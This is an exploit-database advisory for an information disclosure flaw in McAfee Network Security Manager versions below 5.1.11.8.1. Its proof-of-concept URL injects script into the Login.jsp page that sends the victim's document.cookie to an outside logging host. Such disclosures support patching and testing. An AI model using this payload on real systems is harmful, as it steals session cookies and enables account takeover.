[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : McAfee Network Security Manager <5.1.11.8.1 Information Disclosure Vulnerability
# Published : 2009-11-12
# Author : Daniel King
# Previous Title : Article Directory Index.PHP Remote File Include Vulnerability
# Next Title : McAfee Network Security Manager <5.1.11.8.1 Multiple Cross Site Scripting Vulnerabilities


To exploit this issue, an attacker must entice an unsuspecting user to view a malicious webpage.

The following proof of concept uses a cross-site scripting attack to leverage this issue:

https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57